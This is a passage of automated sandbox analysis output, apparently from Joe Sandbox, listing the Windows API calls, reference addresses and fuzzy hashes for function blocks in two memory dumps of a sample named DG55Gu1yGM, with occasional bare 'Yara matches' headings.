                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BE0D861A803162DE711B7B44C13FBB369D5B00B41F540861BD14E10C1FFA4E60449A4
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 200240550-0
                                                                                                                                                                                                                                        • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                        • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 02132959: TlsAlloc.KERNEL32(?,02130DA0), ref: 0213295F
                                                                                                                                                                                                                                        • TlsAlloc.KERNEL32(?,02130DA0), ref: 02143BE6
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 02143BF8
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02143C0E
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02143C1C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3735082963-0
                                                                                                                                                                                                                                        • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                        • Instruction ID: c277fdce9a8330b704ccbc535df54ea83c5ba422147d7d4a242dc7b6a7e895f5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43E06874580206AFC310BFB59C4AB7E72AA6B003117300E76E439D20A0EF34D1058F6C
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                        • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00423991
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3735082963-0
                                                                                                                                                                                                                                        • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                        • Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02130DA0), ref: 0213279E
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02130DA0), ref: 021327AD
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021327C3
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 021327D1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3016159387-0
                                                                                                                                                                                                                                        • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                        • Instruction ID: 6958f460681eb5663124b6aa06c9c049f828a3c0badf05d246b1c9f359736be8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0DE0867464010AABCB00FBF5DD49EAF73BD7B00B05B600575A905E3150EB78DB088B79
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3016159387-0
                                                                                                                                                                                                                                        • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                        • Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetThreadPriority.KERNEL32(?,?), ref: 021328F8
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 02132904
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0213291A
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02132928
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4286982218-0
                                                                                                                                                                                                                                        • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                        • Instruction ID: de09b584c036983a65058b654ffb6d4a6803692e74e5d30957d71feacd39d43d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13E0863454011AABCB15BF75CC05BBB37AD6B00745B504925BC19D20A0EF39D5148B98
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • TlsSetValue.KERNEL32(?,00000000,02137BD8,00000000,?,?,02130DA0,?,?,?,00000000,?,00000000), ref: 021329BE
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 021329CA
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021329E0
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 021329EE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1964976909-0
                                                                                                                                                                                                                                        • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                        • Instruction ID: 8a2354caa57de708a9aaff1bea08cf2f09df4a4548e45b820b4eb385662854e3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72E086341401196BDB11BF74CC09BBF37AD6F00745B500925BD19D20A0EF35D5149BA8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041269D
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4286982218-0
                                                                                                                                                                                                                                        • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                        • Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1964976909-0
                                                                                                                                                                                                                                        • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                        • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • TlsAlloc.KERNEL32(?,02130DA0), ref: 0213295F
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0213296C
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02132982
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02132990
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3103352999-0
                                                                                                                                                                                                                                        • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                        • Instruction ID: 9d56180658b44772ae942b125140476625a91cd879878512d4fe12a02601eb50
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABE012345401156B8715BBB89C49A7B72AA6B01765B600B25F865E20E0EB78D5088AA9
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00412705
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3103352999-0
                                                                                                                                                                                                                                        • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                        • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 0042F10D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                                                                                                                                        • String ID: pow
                                                                                                                                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                        • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                        • Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0215B32B,?,00000050,?,?,?,?,?), ref: 0215B1AB
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                        • API String ID: 0-711371036
                                                                                                                                                                                                                                        • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                        • Instruction ID: 92c4536b7ca73807b5d018b88fdfb5356d30969857af3b6b6da04e320f7fcb52
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D21B862A88125E6DBA48E64AD817977397EF40B5CF5780A4ED29D7208F732DB00C390
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                        • API String ID: 0-711371036
                                                                                                                                                                                                                                        • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                        • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 02154B72
                                                                                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 02154B84
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileHandleType
                                                                                                                                                                                                                                        • String ID: @YV
                                                                                                                                                                                                                                        • API String ID: 3000768030-1722435086
                                                                                                                                                                                                                                        • Opcode ID: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
                                                                                                                                                                                                                                        • Instruction ID: 5bb0deef0952f01b7cc3e1103a626cec541b62b990f5ba82128dae2a97017c4a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED11B779584F72CAD7344E3E9C88722BAA4EB46135B2907AAE8B6C75F2C331D5C5C244
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 0043490B
                                                                                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 0043491D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileHandleType
                                                                                                                                                                                                                                        • String ID: @YV
                                                                                                                                                                                                                                        • API String ID: 3000768030-1722435086
                                                                                                                                                                                                                                        • Opcode ID: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
                                                                                                                                                                                                                                        • Instruction ID: 9875bc295672454492d04964ad4796884c43b126410369cfab48893691dd09dc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B11D5B550474146DB304E3E8C88763BA94AFDA334F38276BD0B6936F1C22CE9829649
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                        • String ID: @YV
                                                                                                                                                                                                                                        • API String ID: 269201875-1722435086
                                                                                                                                                                                                                                        • Opcode ID: 1e45f9f31c81076afc210aa4e6c3c8456cebbdc50b4c4a77426141023d54f72a
                                                                                                                                                                                                                                        • Instruction ID: c8d2cc5dd6052684e0ab8b3849dd3eb778ef3ae410bc9523042c0d7cea3665d4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e45f9f31c81076afc210aa4e6c3c8456cebbdc50b4c4a77426141023d54f72a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C11B671B813149FE7209B2DAC84B5537A59B80771F240677E929CB2E1EB70D6864FC4
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                        • String ID: @YV
                                                                                                                                                                                                                                        • API String ID: 269201875-1722435086
                                                                                                                                                                                                                                        • Opcode ID: ebce9d5c91b3d956de1d8ff8f87ab7d1476279e4ec14c59c740c308a46226624
                                                                                                                                                                                                                                        • Instruction ID: eb719cc1bfb6819218d089f87952d2fc75fd927a7e25ce3d54c3d3c6ae1b4b1e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebce9d5c91b3d956de1d8ff8f87ab7d1476279e4ec14c59c740c308a46226624
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E11D671B003105ED7209F2DBC81B5A3AA4AB94765F240637F920CA3D1D378D9864B8D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                                                                                                                                                                                                        • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EncodersGdipImage$Size
                                                                                                                                                                                                                                        • String ID: image/png
                                                                                                                                                                                                                                        • API String ID: 864223233-2966254431
